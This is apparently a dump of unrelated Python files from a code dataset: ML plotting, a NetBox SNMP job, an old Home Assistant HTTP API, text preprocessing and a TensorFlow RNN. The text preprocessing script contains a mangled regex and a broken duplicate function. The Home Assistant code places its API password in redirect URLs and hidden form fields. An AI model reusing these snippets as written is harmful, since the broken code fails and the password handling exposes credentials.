# -*- coding: utf-8 -*-
def f_y(theta, x):
    """Decision-boundary ordinate: solve theta0 + theta1*x + theta2*y = 0 for y."""
    numerator = theta[0] + theta[1] * x
    return numerator / -theta[2]
def plotDecisionBoundary(theta, X, y):
    """Plot the training data plus the decision boundary implied by theta.

    With <= 3 features the boundary is drawn as a straight line; otherwise
    it is traced as the zero contour of the mapped polynomial features.
    NOTE(review): assumes X[:, 0] is the intercept column -- confirm with
    callers; the ``theta[3] = 1`` branch for n < 2 looks suspect as well.
    """
    import numpy as np
    import matplotlib.pyplot as plt
    from ex2_logistic_regression.plotData import plotData

    plotData(X[:, 1:], y)
    m, n = np.shape(X)
    if n <= 3:
        min_x = min(X[:, 1])
        max_x = max(X[:, 1])
        x = np.array([X[:, 1].min(), X[:, 1].max()])
        if n < 2:
            theta[3] = 1
        y = [f_y(theta, min_x), f_y(theta, max_x)]
        plt.figure(1)
        plt.title('Linear regression With GCD')
        plt.xlabel('x')
        plt.ylabel('y')
        plt.scatter(x, y, marker='o', color='k', s=10, label='point')
        plt.legend(loc='lower right')
        plt.plot(x, y)
        plt.show()
    else:
        from ex2_logistic_regression.mapFeature import mapFeature
        u_vals = np.linspace(-1, 1.5, 50)
        v_vals = np.linspace(-1, 1.5, 50)
        grid = np.zeros(shape=(len(u_vals), len(v_vals)))
        # Evaluate theta against the mapped features over the whole grid.
        for i in range(len(u_vals)):
            for j in range(len(v_vals)):
                grid[i, j] = (mapFeature([u_vals[i]], [v_vals[j]]).dot(theta))
        grid = grid.T
        contour = plt.contour(u_vals, v_vals, grid, 0, origin='upper')
        contour.collections[0].set_label('Decision Boundary')
| StarcoderdataPython |
9680683 | import logging
from datetime import datetime
import django_rq
from django.conf import settings
from django_rq import job
from dcim.models import Device
from easysnmp import EasySNMPError, snmp_get
from .models import PDUConfig, PDUStatus
# Module-level logger for the RQ worker; DEBUG so scheduled-job output is visible.
logger = logging.getLogger("rq.worker")
logger.setLevel(logging.DEBUG)
@job
def collect_power_usage_info():
    """RQ job: poll every PDU-capable device over SNMP and persist its power usage.

    Returns a list of one-entry dicts mapping device name -> raw SNMP value.
    Raises on the first SNMP failure (after logging it).
    """
    config = settings.PLUGINS_CONFIG["axians_netbox_pdu"]
    # Only devices whose type has a PDUConfig and that have a primary IPv4.
    devices = Device.objects.filter().exclude(
        device_type__pduconfig__isnull=True).exclude(primary_ip4__isnull=True)
    logging.info("Start: Collecting Power Usage Information")
    results = []
    for device in devices:
        try:
            power_usage = snmp_get(
                device.device_type.pduconfig.power_usage_oid,
                hostname=str(device.primary_ip4.address.ip),
                community=config["snmp_read"],
                version=2,
            )
        except EasySNMPError as err:
            logging.error(f"Failed to get power usage status for {device.name}: {err}.")
            raise
        PDUStatus.objects.update_or_create(
            device=device, defaults={"power_usage": power_usage.value})
        results.append({device.name: power_usage.value})
    logging.info("FINISH: Collecting Power Usage Information")
    return results
| StarcoderdataPython |
5184509 | <filename>setup.py
from setuptools import setup, find_packages
setup(
name="simplerosbag",
version="0.1",
packages=['genpy', 'genmsg', 'std_msgs', 'simplerosbag'],
)
| StarcoderdataPython |
273496 | """Vagrant specific install profile."""
from .. import vagrant_aliases as aliases
# Default install settings for the Vagrant profile (internal DNS domain and
# the DNS server address baked into the Vagrant network).
DEFAULTS = {
'treadmill_dns_domain': 'treadmill.internal',
'treadmill_dns_server': '10.10.10.10'
}
# Re-export the Vagrant alias table under the name the installer expects.
ALIASES = aliases.ALIASES
| StarcoderdataPython |
6410111 | from __future__ import print_function
def cprint(*args, **kwargs):
    """print() wrapper that colors the output with an ANSI escape sequence.

    Accepts an extra keyword argument ``color`` (case-insensitive). Missing
    or unknown colors fall back to BLUE. All other arguments are forwarded
    to ``print``.
    """
    # Build the escape-code table once and memoize it on the function object.
    if not hasattr(cprint, 'table'):
        cprint.table = {
            'RED': '\033[91m',
            'GREEN': '\033[92m',
            'YELLOW': '\033[93m',
            'BLUE': '\033[94m',
            'MAGENTA': '\033[95m',
            'CYAN': '\033[96m',
            'WHITE': '\033[97m',
            'ENDC': '\033[0m',
        }
    color = kwargs.pop('color', 'BLUE').upper()
    if color not in cprint.table:
        color = 'BLUE'
    print(cprint.table[color], end='')
    print(*args, **kwargs)
    print(cprint.table['ENDC'], end='')
if __name__ == '__main__':
    # Demo: print 'Test' in every supported color, then uncolored.
    for demo_color in ('RED', 'BLUE', 'GREEN', 'YELLOW', 'MAGENTA', 'CYAN', 'WHITE'):
        cprint('Test', color=demo_color)
    print('Test')
| StarcoderdataPython |
1736377 | """
homeassistant.httpinterface
~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module provides an API and a HTTP interface for debug purposes.
By default it will run on port 8123.
All API calls have to be accompanied by an 'api_password' parameter and will
return JSON. If successful calls will return status code 200 or 201.
Other status codes that can occur are:
- 400 (Bad Request)
- 401 (Unauthorized)
- 404 (Not Found)
- 405 (Method not allowed)
The api supports the following actions:
/api/states - GET
Returns a list of categories for which a state is available
Example result:
{
"categories": [
"Paulus_Nexus_4",
"weather.sun",
"all_devices"
]
}
/api/states/<category> - GET
Returns the current state from a category
Example result:
{
"attributes": {
"next_rising": "07:04:15 29-10-2013",
"next_setting": "18:00:31 29-10-2013"
},
"category": "weather.sun",
"last_changed": "23:24:33 28-10-2013",
"state": "below_horizon"
}
/api/states/<category> - POST
Updates the current state of a category. Returns status code 201 if successful
with location header of updated resource and as body the new state.
parameter: new_state - string
optional parameter: attributes - JSON encoded object
Example result:
{
"attributes": {
"next_rising": "07:04:15 29-10-2013",
"next_setting": "18:00:31 29-10-2013"
},
"category": "weather.sun",
"last_changed": "23:24:33 28-10-2013",
"state": "below_horizon"
}
/api/events/<event_type> - POST
Fires an event with event_type
optional parameter: event_data - JSON encoded object
Example result:
{
"message": "Event download_file fired."
}
"""
import json
import threading
import logging
import re
import os
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from urlparse import urlparse, parse_qs
import homeassistant as ha
import homeassistant.util as util
# Default TCP port for the debug HTTP interface.
SERVER_PORT = 8123

# HTTP status codes used by the request handler.
HTTP_OK = 200
HTTP_CREATED = 201
HTTP_MOVED_PERMANENTLY = 301
HTTP_BAD_REQUEST = 400
HTTP_UNAUTHORIZED = 401
HTTP_NOT_FOUND = 404
HTTP_METHOD_NOT_ALLOWED = 405
HTTP_UNPROCESSABLE_ENTITY = 422

# URL paths served by the debug interface and the JSON API
# ({} placeholders are filled with category / event_type / file name).
URL_ROOT = "/"
URL_CHANGE_STATE = "/change_state"
URL_FIRE_EVENT = "/fire_event"
URL_API_STATES = "/api/states"
URL_API_STATES_CATEGORY = "/api/states/{}"
URL_API_EVENTS = "/api/events"
URL_API_EVENTS_EVENT = "/api/events/{}"
URL_STATIC = "/static/{}"
class HTTPInterface(threading.Thread):
""" Provides an HTTP interface for Home Assistant. """
# pylint: disable=too-many-arguments
def __init__(self, eventbus, statemachine, api_password,
server_port=None, server_host=None):
threading.Thread.__init__(self)
self.daemon = True
if not server_port:
server_port = SERVER_PORT
# If no server host is given, accept all incoming requests
if not server_host:
server_host = '0.0.0.0'
self.server = HTTPServer((server_host, server_port), RequestHandler)
self.server.flash_message = None
self.server.logger = logging.getLogger(__name__)
self.server.eventbus = eventbus
self.server.statemachine = statemachine
self.server.api_password = <PASSWORD>
eventbus.listen_once(ha.EVENT_HOMEASSISTANT_START,
lambda event: self.start())
def run(self):
""" Start the HTTP interface. """
self.server.logger.info("Starting")
self.server.serve_forever()
# NOTE(review): indentation and blank lines appear stripped in this copy of
# the file; code below is left byte-identical, only comments were added.
class RequestHandler(BaseHTTPRequestHandler):
""" Handles incoming HTTP requests """
# Dispatch table: (HTTP method, path string or compiled regex, handler name).
# Regex entries capture named groups (category / event_type / file) that the
# handlers read from the match object.
PATHS = [ # debug interface
('GET', '/', '_handle_get_root'),
('POST', re.compile(r'/change_state'), '_handle_change_state'),
('POST', re.compile(r'/fire_event'), '_handle_fire_event'),
# /states
('GET', '/api/states', '_handle_get_api_states'),
('GET',
re.compile(r'/api/states/(?P<category>[a-zA-Z\._0-9]+)'),
'_handle_get_api_states_category'),
('POST',
re.compile(r'/api/states/(?P<category>[a-zA-Z\._0-9]+)'),
'_handle_change_state'),
# /events
('GET', '/api/events', '_handle_get_api_events'),
('POST',
re.compile(r'/api/events/(?P<event_type>[a-zA-Z\._0-9]+)'),
'_handle_fire_event'),
# Static files
('GET', re.compile(r'/static/(?P<file>[a-zA-Z\._\-0-9/]+)'),
'_handle_get_static')
]
# True once the request is recognized as an /api/ call: responses are JSON
# instead of the HTML debug pages.
use_json = False
def _handle_request(self, method): # pylint: disable=too-many-branches
""" Does some common checks and calls appropriate method. """
url = urlparse(self.path)
# Read query input
data = parse_qs(url.query)
# Did we get post input ?
content_length = int(self.headers.get('Content-Length', 0))
if content_length:
data.update(parse_qs(self.rfile.read(content_length)))
try:
api_password = data['api_password'][0]
except KeyError:
api_password = ''
if url.path.startswith('/api/'):
self.use_json = True
# Var to keep track if we found a path that matched a handler but
# the method was different
path_matched_but_not_method = False
# Var to hold the handler for this path and method if found
handle_request_method = False
# Check every handler to find matching result
for t_method, t_path, t_handler in RequestHandler.PATHS:
# we either do string-comparison or regular expression matching
if isinstance(t_path, str):
path_match = url.path == t_path
else:
# pylint: disable=maybe-no-member
path_match = t_path.match(url.path)
if path_match and method == t_method:
# Call the method
handle_request_method = getattr(self, t_handler)
break
elif path_match:
path_matched_but_not_method = True
# Did we find a handler for the incoming request?
if handle_request_method:
# Do not enforce api password for static files
if handle_request_method == self._handle_get_static or \
self._verify_api_password(api_password):
handle_request_method(path_match, data)
elif path_matched_but_not_method:
self.send_response(HTTP_METHOD_NOT_ALLOWED)
else:
self.send_response(HTTP_NOT_FOUND)
def do_GET(self): # pylint: disable=invalid-name
""" GET request handler. """
self._handle_request('GET')
def do_POST(self): # pylint: disable=invalid-name
""" POST request handler. """
self._handle_request('POST')
def _verify_api_password(self, api_password):
""" Helper method to verify the API password
and take action if incorrect. """
if api_password == self.server.api_password:
return True
elif self.use_json:
self._message(
"API password missing or incorrect.", HTTP_UNAUTHORIZED)
else:
# Non-API request with a bad password: render the login form.
self.send_response(HTTP_OK)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write((
"<html>"
"<head><title>Home Assistant</title>"
"<link rel='stylesheet' type='text/css' "
"href='/static/style.css'>"
"<link rel='icon' href='/static/favicon.ico' "
"type='image/x-icon' />"
"</head>"
"<body>"
"<div class='container'>"
"<form class='form-signin' action='{}' method='GET'>"
"<input type='text' class='form-control' name='api_password' "
"placeholder='API Password for Home Assistant' "
"required autofocus>"
"<button class='btn btn-lg btn-primary btn-block' "
"type='submit'>Enter</button>"
"</form>"
"</div>"
"</body></html>").format(self.path))
return False
# pylint: disable=unused-argument
def _handle_get_root(self, path_match, data):
""" Renders the debug interface. """
write = lambda txt: self.wfile.write(txt+"\n")
self.send_response(HTTP_OK)
self.send_header('Content-type', 'text/html')
self.end_headers()
write(("<html>"
"<head><title>Home Assistant</title>"
"<link rel='stylesheet' type='text/css' "
"href='/static/style.css'>"
"<link rel='icon' href='/static/favicon.ico' "
"type='image/x-icon' />"
"</head>"
"<body>"
"<div class='container'>"
"<div class='page-header'><h1>Home Assistant</h1></div>"
))
# Flash message support
if self.server.flash_message:
write(("<div class='row'><div class='col-xs-12'>"
"<div class='alert alert-success'>"
"{}</div></div></div>").format(self.server.flash_message))
self.server.flash_message = None
# Describe state machine:
categories = []
write(("<div class='row'>"
"<div class='col-xs-12'>"
"<div class='panel panel-primary'>"
"<div class='panel-heading'><h2 class='panel-title'>"
"States</h2></div>"
"<form method='post' action='/change_state' "
"class='form-change-state'>"
"<input type='hidden' name='api_password' value='{}'>"
"<table class='table'><tr>"
"<th>Category</th><th>State</th>"
"<th>Attributes</th><th>Last Changed</th>"
"</tr>").format(self.server.api_password))
for category in \
sorted(self.server.statemachine.categories,
key=lambda key: key.lower()):
categories.append(category)
state = self.server.statemachine.get_state(category)
attributes = "<br>".join(
["{}: {}".format(attr, state['attributes'][attr])
for attr in state['attributes']])
write(("<tr>"
"<td>{}</td><td>{}</td><td>{}</td><td>{}</td>"
"</tr>").format(
category,
state['state'],
attributes,
state['last_changed']))
# Change state form
write(("<tr><td><input name='category' class='form-control' "
"placeholder='Category'></td>"
"<td><input name='new_state' class='form-control' "
"placeholder='New State'></td>"
"<td><textarea rows='3' name='attributes' class='form-control' "
"placeholder='State Attributes (JSON, optional)'>"
"</textarea></td>"
"<td><button type='submit' class='btn btn-default'>"
"Set State</button></td></tr>"
"</table></form></div>"
"</div></div>"))
# Describe event bus:
write(("<div class='row'>"
"<div class='col-xs-6'>"
"<div class='panel panel-primary'>"
"<div class='panel-heading'><h2 class='panel-title'>"
"Events</h2></div>"
"<table class='table'>"
"<tr><th>Event Type</th><th>Listeners</th></tr>"))
for event_type, count in sorted(
self.server.eventbus.listeners.items()):
write("<tr><td>{}</td><td>{}</td></tr>".format(event_type, count))
# Fire-event form.
write(("</table></div></div>"
"<div class='col-xs-6'>"
"<div class='panel panel-primary'>"
"<div class='panel-heading'><h2 class='panel-title'>"
"Fire Event</h2></div>"
"<div class='panel-body'>"
"<form method='post' action='/fire_event' "
"class='form-horizontal form-fire-event'>"
"<input type='hidden' name='api_password' value='{}'>"
"<div class='form-group'>"
"<label for='event_type' class='col-xs-3 control-label'>"
"Event type</label>"
"<div class='col-xs-9'>"
"<input type='text' class='form-control' id='event_type'"
" name='event_type' placeholder='Event Type'>"
"</div>"
"</div>"
"<div class='form-group'>"
"<label for='event_data' class='col-xs-3 control-label'>"
"Event data</label>"
"<div class='col-xs-9'>"
"<textarea rows='3' class='form-control' id='event_data'"
" name='event_data' placeholder='Event Data "
"(JSON, optional)'></textarea>"
"</div>"
"</div>"
"<div class='form-group'>"
"<div class='col-xs-offset-3 col-xs-9'>"
"<button type='submit' class='btn btn-default'>"
"Fire Event</button>"
"</div>"
"</div>"
"</form>"
"</div></div></div>"
"</div>").format(self.server.api_password))
write("</div></body></html>")
# pylint: disable=invalid-name
def _handle_change_state(self, path_match, data):
""" Handles updating the state of a category.
This handles the following paths:
/change_state
/api/states/<category>
"""
try:
try:
category = path_match.group('category')
except IndexError:
# If group 'category' does not exist in path_match
category = data['category'][0]
new_state = data['new_state'][0]
try:
attributes = json.loads(data['attributes'][0])
except KeyError:
# Happens if key 'attributes' does not exist
attributes = None
# Write state
self.server.statemachine.set_state(category,
new_state,
attributes)
# Return state if json, else redirect to main page
if self.use_json:
state = self.server.statemachine.get_state(category)
state['category'] = category
self._write_json(state, status_code=HTTP_CREATED,
location=
URL_API_STATES_CATEGORY.format(category))
else:
self._message(
"State of {} changed to {}".format(category, new_state))
except KeyError:
# If new_state don't exist in post data
self._message(
"No new_state submitted.", HTTP_BAD_REQUEST)
except ValueError:
# Occurs during error parsing json
self._message(
"Invalid JSON for attributes", HTTP_UNPROCESSABLE_ENTITY)
# pylint: disable=invalid-name
def _handle_fire_event(self, path_match, data):
""" Handles firing of an event.
This handles the following paths:
/fire_event
/api/events/<event_type>
"""
try:
try:
event_type = path_match.group('event_type')
except IndexError:
# If group event_type does not exist in path_match
event_type = data['event_type'][0]
try:
event_data = json.loads(data['event_data'][0])
except KeyError:
# Happens if key 'event_data' does not exist
event_data = None
self.server.eventbus.fire(event_type, event_data)
self._message("Event {} fired.".format(event_type))
except KeyError:
# Occurs if event_type does not exist in data
self._message("No event_type received.", HTTP_BAD_REQUEST)
except ValueError:
# Occurs during error parsing json
self._message(
"Invalid JSON for event_data", HTTP_UNPROCESSABLE_ENTITY)
# pylint: disable=unused-argument
def _handle_get_api_states(self, path_match, data):
""" Returns the categories which state is being tracked. """
self._write_json({'categories': self.server.statemachine.categories})
# pylint: disable=unused-argument
def _handle_get_api_states_category(self, path_match, data):
""" Returns the state of a specific category. """
category = path_match.group('category')
state = self.server.statemachine.get_state(category)
if state:
state['category'] = category
self._write_json(state)
else:
# If category does not exist
self._message("State does not exist.", HTTP_UNPROCESSABLE_ENTITY)
def _handle_get_api_events(self, path_match, data):
""" Handles getting overview of event listeners. """
self._write_json({'listeners': self.server.eventbus.listeners})
def _handle_get_static(self, path_match, data):
""" Returns a static file. """
# sanitize_filename prevents path traversal outside www_static.
req_file = util.sanitize_filename(path_match.group('file'))
path = os.path.join(os.path.dirname(__file__), 'www_static', req_file)
if os.path.isfile(path):
self.send_response(HTTP_OK)
# TODO: correct header for mime-type and caching
self.end_headers()
# Stream the file out in 1 KiB chunks.
with open(path, 'rb') as inp:
data = inp.read(1024)
while data:
self.wfile.write(data)
data = inp.read(1024)
else:
self.send_response(HTTP_NOT_FOUND)
self.end_headers()
def _message(self, message, status_code=HTTP_OK):
""" Helper method to return a message to the caller. """
if self.use_json:
self._write_json({'message': message}, status_code=status_code)
elif status_code == HTTP_OK:
# Success on the debug UI: flash the message and go back home.
self.server.flash_message = message
self._redirect('/')
else:
self.send_error(status_code, message)
def _redirect(self, location):
""" Helper method to redirect caller. """
self.send_response(HTTP_MOVED_PERMANENTLY)
self.send_header(
"Location", "{}?api_password={}".format(
location, self.server.api_password))
self.end_headers()
def _write_json(self, data=None, status_code=HTTP_OK, location=None):
""" Helper method to return JSON to the caller. """
self.send_response(status_code)
self.send_header('Content-type', 'application/json')
if location:
self.send_header('Location', location)
self.end_headers()
if data:
self.wfile.write(json.dumps(data, indent=4, sort_keys=True))
| StarcoderdataPython |
9752261 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" script for preprocessing question texts in parallel
"""
import argparse
import sys
import os
import re
import numpy as np
import pandas as pd
import traceback
import time
import gensim
import nltk
import tqdm
import phonenumbers
from multiprocessing import Process, Pool
from multiprocessing.managers import BaseManager, NamespaceProxy
import utils
import siamese_evaluation
WORD2VEC_FILE = "./resource/GoogleNews-vectors-negative300.bin.gz"
PREPROCESS_GENERAL = "./resource/replace.csv"
PREPROCESS_UNITS = "./resource/units.csv"
def parse_args(argv):
    """Build the CLI parser and parse *argv* (program name excluded)."""
    arg_parser = argparse.ArgumentParser(
        description=__doc__,
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    arg_parser.add_argument("outdir", help="output directory")
    arg_parser.add_argument("files", nargs="+", help="csv files contains raw data")
    return arg_parser.parse_args(argv)
class SharedResource(object):
    """
    hold a list of vocabulary used in text preprocessing
    """

    def __init__(self, vocabs):
        self.vocabs = vocabs

    def get(self, fname):
        """Return the named resource; only "vocabs" is defined."""
        if fname != "vocabs":
            raise Exception("{0} is not defined".format(fname))
        return self.vocabs
class ResourceManager(BaseManager):
    """Multiprocessing manager that serves SharedResource proxies."""
    pass


# Expose SharedResource through the manager so worker processes can call
# .get("vocabs") on a proxy instead of pickling the whole vocabulary.
ResourceManager.register("SharedResource", SharedResource)
def aggregate(ret):
    """
    Pool callback: collect one worker's result.

    Args:
        ret: a (process index, dataframe) pair returned by a worker
    """
    aggregate.out.append(ret)


# Accumulator shared by all callbacks; reset by the caller after each batch.
aggregate.out = []
def prep(text, vocabs):
    """
    substitute special characters, replace abbreviations, and encode to ascii
    (Python 2: takes a byte string, returns an ascii-encoded byte string)

    Args:
        text: a question
        vocabs: vocabulary available in a pretrained word2vec model

    Returns:
        preprocessed text
    """
    text = text.decode("utf-8")
    # Normalize typographic punctuation and accented characters.
    text = re.sub("’", "'", text)
    text = re.sub("`", "'", text)
    text = re.sub("“", '"', text)
    # NOTE(review): a bare "?" is an invalid regex ("nothing to repeat");
    # the pattern was presumably a full-width question mark originally --
    # confirm against the pristine source. Left as found.
    text = re.sub("?", "?", text)
    text = re.sub("…", " ", text)
    text = re.sub("é", "e", text)
    text = re.sub(r"\.+", ".", text)
    text = text.replace("[math]", " ")
    text = text.replace("[/math]", " ")
    # Lazily load the abbreviation table once; memoized on the function.
    if prep.dict is None:
        prep.dict = pd.read_csv(PREPROCESS_GENERAL).set_index("src")[
            "dst"].to_dict()
        for k in prep.dict.keys():
            prep.dict[k.lower()] = prep.dict[k]
    for k in prep.dict.keys():
        if k in text:
            text = text.replace(k, prep.dict[k])
    # Lazily load unit names; insert a space between a decimal and its unit.
    if prep.units is None:
        with open(PREPROCESS_UNITS, "rU") as f:
            prep.units = [l.replace('\n', '') for l in f]
    for u in prep.units:
        text = re.sub(r"(\d+\.\d+){0}".format(u), "\\1 {0}".format(u), text)
    # Split "word.word" when doing so rescues an out-of-vocabulary token
    # (skipping common domain suffixes like .com).
    for match in re.finditer(r"([a-zA-z]*)\.([a-zA-z]*)", text):
        m01 = match.group(0)
        m0 = match.group(1)
        m1 = match.group(2)
        if m01 not in vocabs and m1 in vocabs \
                and m1.lower() not in ("com", "org", "net", "exe", "js", "biz", "care", "ly", "io", "in", "jp", "au", "gov", "ca", "cn", "fr", "hk", "kr", "mx") \
                and (m1.lower() in ("i", "a") or len(m1) > 1) \
                and m1[-1] != ".":
            text = text.replace(m01, m01.replace(".", ". "))
    # NOTE(review): same mangled "?" issue in this pattern -- left as found.
    for match in re.finditer(r"([a-zA-z]*)?([a-zA-z]*)", text):
        m01 = match.group(0)
        m0 = match.group(1)
        m1 = match.group(2)
        if m01 not in vocabs and m0 in vocabs \
                and m1 in vocabs \
                and (m1.lower() in ("i", "a") or len(m1) > 1):
            text = text.replace(m01, m01.replace(".", ". "))
    text = re.sub(r"/", " or ", text)
    text = text.encode("ascii", "ignore")
    return text


# Lazy-loaded caches for the replacement table and unit list.
prep.dict = None
prep.units = None
def post(tokens):
    """
    post-process output from NLTK tokenizer: strip one trailing '.' per token

    Args:
        tokens: a list containing a tokenized text

    Returns:
        processed tokens
    """
    return [t[:-1] if t[-1] == "." else t for t in tokens]
def tokenize_wrapper(text):
    """
    wrapper function for NLTK tokenizer

    Args:
        text: a question

    Returns:
        a list of tokens with any trailing '.' stripped from each token
    """
    # Delegate the trailing-dot stripping to post() instead of duplicating
    # its loop here (the two implementations had drifted into copies).
    return post(nltk.word_tokenize(text))
def indices_for(df, nprocs):
    """
    Assign each row of *df* to a process group.

    Rows are split into ``nprocs`` equal chunks; any remainder rows are
    assigned to the last process.

    Args:
        df: object with a ``.shape[0]`` row count (dataframe/array)
        nprocs: number of processes used

    Returns:
        list of group indices, one per row
    """
    total = df.shape[0]
    per_proc = int(total / nprocs)
    indices = []
    for proc in range(nprocs):
        indices.extend([proc] * per_proc)
    # Remainder rows all go to the last process.
    indices.extend([nprocs - 1] * (total - nprocs * per_proc))
    return indices
def init_shared_resource(vocabs):
    """Start a ResourceManager server process and return a SharedResource proxy."""
    manager = ResourceManager()
    manager.start()
    return manager.SharedResource(vocabs)
def preprocess(shared_resource, df, nprocs):
    """
    Perform basic preprocessing of *df* in parallel across *nprocs* workers.

    NOTE(review): this function is shadowed by a second ``preprocess``
    defined later in this module -- confirm which one callers intend.

    Args:
        shared_resource: SharedResource proxy holding the vocabulary
        df: Pandas dataframe object
        nprocs: number of processes used

    Returns:
        Pandas dataframe object with preprocessed texts
    """
    t = time.time()
    # Fan the row groups out to the pool; results arrive via aggregate().
    pool = Pool(nprocs)
    for i, (name, df_group) in enumerate(df.groupby(indices_for(df, nprocs))):
        pool.apply_async(func=base_worker,
                         args=(shared_resource, df_group, i),
                         callback=aggregate)
    pool.close()
    pool.join()
    # Restore the original row order, then reset the shared accumulator.
    aggregate.out.sort(key=lambda x: x[0])
    df_out = pd.concat([df_ret for i, df_ret in aggregate.out])
    aggregate.out = []
    print("Time {0} sec".format(time.time() - t))
    return df_out
def base_worker(shared_resource, df, iproc):
    """
    base worker function for text preprocessing

    Args:
        shared_resource: proxy exposing the word2vec vocabulary ("vocabs")
        df: Pandas dataframe slice assigned to this process
        iproc: process index (used by the callback to restore row order)

    Returns:
        (iproc, df) with preprocessed q1/q2 columns and extracted US phone
        numbers added
    """
    try:
        df.fillna(value="", inplace=True)
        vocabs = shared_resource.get("vocabs")
        print("basic preprocessing")
        df["q1"] = df["question1"].apply(prep, args=(vocabs,))
        df["q2"] = df["question2"].apply(prep, args=(vocabs,))
        print("basic preprocessing done")
        # Tokenization is intentionally skipped here (previously dead code).
        # add phone numbers if exists
        df["q1_phone_us"] = df["q1"].apply(extract_phone)
        df["q2_phone_us"] = df["q2"].apply(extract_phone)
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
        # in a worker are not swallowed and re-raised as a plain Exception.
        traceback.print_exc()
        raise Exception("Exception")
    return iproc, df
def extract_phone(text):
    """
    Best-effort extraction of a US phone number from a question.

    Args:
        text: a question

    Returns:
        the first US number in E164 format, or "" when none is found
        (or when the phonenumbers library raises on malformed input)
    """
    try:
        # Assumes at most one relevant US number per question; the first
        # match wins. The bare except is a deliberate best-effort guard.
        for match in phonenumbers.PhoneNumberMatcher(text, "US"):
            return phonenumbers.format_number(
                match.number, phonenumbers.PhoneNumberFormat.E164)
    except:
        pass
    return ""
# NOTE(review): this second ``preprocess`` definition shadows the
# multiprocessing ``preprocess(shared_resource, df, nprocs)`` defined above
# and looks like unfinished scaffolding:
#   * ``run``, ``df_train``, ``nprocs`` are undefined names here, and
#     ``shared_resource`` is used before it is assigned;
#   * ``preprocess.WORD2VEC_FILE`` / ``preprocess.init_shared_resource`` are
#     never set as function attributes (module-level WORD2VEC_FILE and
#     init_shared_resource exist instead);
#   * the word2vec model is loaded *after* the per-file loop that needs it.
# Left byte-identical; needs a rewrite before use.
def preprocess(files, outdir):
for f in files:
df = pd.read_csv(f)
df = run(shared_resource, df_train, nprocs)
print("loading {0}".format(os.path.basename(preprocess.WORD2VEC_FILE)))
t = time.time()
word2vec = gensim.models.KeyedVectors.load_word2vec_format(
preprocess.WORD2VEC_FILE, binary=True)
print("done ({0} sec)".format(round(time.time() - t)))
vocabs = word2vec.vocab.keys()
# preprocess all data
print("initialize shared resource")
shared_resource = preprocess.init_shared_resource(vocabs)
def main(argv):
    """Entry point: parse the CLI arguments and run the preprocessing."""
    parsed = parse_args(argv)
    preprocess(parsed.files, parsed.outdir)


if __name__ == '__main__':
    exit(main(sys.argv[1:]))
| StarcoderdataPython |
6458540 | <filename>dis_sdk_python_demo/createstream_sample.py
#!/usr/bin/python
# -*- coding:utf-8 -*-
from dis_sdk_python import *
# Name and shard count of the DIS stream created by this sample.
stream_name = "dis_test1"
partition_count = 1


def createStream_test():
    """Create a DIS stream and print the HTTP status code of the response."""
    client = disclient(endpoint='', ak='', sk='', projectid='', region='')
    try:
        response = client.createStream(
            stream_name, partition_count, data_type='JSON', stream_type='COMMON')
        print(response.statusCode)
    except Exception as error:
        print(str(error))


if __name__ == '__main__':
    print("start createStream ")
    createStream_test()
5083051 | <reponame>zyf668/ml_code
# -*- coding: utf-8 -*-
# Recurrent Neural Network (RNN)
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# load data (downloaded to ./MNIST_data on first use; labels are one-hot vectors)
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)

# hyper parameters
lr = 0.001               # learning rate for the Adam optimizer
training_iters = 100000  # stop after roughly this many training samples
batch_size = 128
#display_step = 10

# Each 28x28 MNIST image is fed as a sequence: 28 time steps of 28 pixels.
n_inputs = 28  # mnist data input (img shape: 28*28)
n_steps = 28  # time steps
n_hidden_units = 128  # neurons in hidden layer
n_classes = 10  # mnist classes (0-9 digits)

# tf graph input
x = tf.placeholder(tf.float32, [None, n_steps, n_inputs])
y = tf.placeholder(tf.float32, [None, n_classes])

# define weights & biases for the input and output projections around the LSTM
weights = {
    # (28, 128)
    'in': tf.Variable(tf.random_normal([n_inputs, n_hidden_units])),
    # (128, 10)
    'out': tf.Variable(tf.random_normal([n_hidden_units, n_classes]))
}
biases = {
    # (128,)
    'in': tf.Variable(tf.constant(0.1, shape=[n_hidden_units, ])),
    # (10,)
    'out': tf.Variable(tf.constant(0.1, shape=[n_classes, ]))
}
### define RNN ###
def RNN(X, weights, biases):
    """Build the graph: input projection -> LSTM -> output projection.

    X is a (batch, n_steps, n_inputs) placeholder; returns the (batch,
    n_classes) logits tensor.
    """
    ## hidden layer for input to cell
    # X ( 128 batch, 28 steps, 28 inputs ) -> ( 128 * 28, 28 inputs )
    X = tf.reshape(X, [-1, n_inputs])
    X_in = tf.matmul(X, weights['in']) + biases['in']
    # X_in -> ( 128 batch, 28 steps, 128 hidden ): back to 3-D for dynamic_rnn
    X_in = tf.reshape(X_in, [-1, n_steps, n_hidden_units])

    ## cell
    lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(
        num_units=n_hidden_units, forget_bias=1.0, state_is_tuple=True)
    # LSTM cell is divided into 2 parts ( c_state, m_state )
    _init_state = lstm_cell.zero_state(batch_size, tf.float32)
    outputs, states = tf.nn.dynamic_rnn(
        cell=lstm_cell, inputs=X_in, initial_state=_init_state, time_major=False)

    ## hidden layer for outputs as results
    # states[1] is the hidden (m) state after the final time step
    results = tf.matmul(states[1], weights['out']) + biases['out']
    return results
pred = RNN(x, weights, biases)
# softmax cross-entropy loss, averaged over the batch
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=pred))
train_op = tf.train.AdamOptimizer(lr).minimize(cost)

# accuracy: fraction of samples whose arg-max prediction matches the label
correct_pred = tf.equal(tf.argmax(pred, axis=1), tf.argmax(y, axis=1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))

# start session
init = tf.global_variables_initializer()
with tf.Session() as sess:
    sess.run(init)
    step = 0
    while step * batch_size < training_iters:
        batch_xs, batch_ys = mnist.train.next_batch(batch_size)
        # reshape flat 784-pixel images into (batch, steps, inputs)
        batch_xs = batch_xs.reshape([batch_size, n_steps, n_inputs])
        sess.run([train_op], feed_dict={x:batch_xs, y:batch_ys})
        if step % 20 == 0:
            # report training-batch accuracy every 20 steps
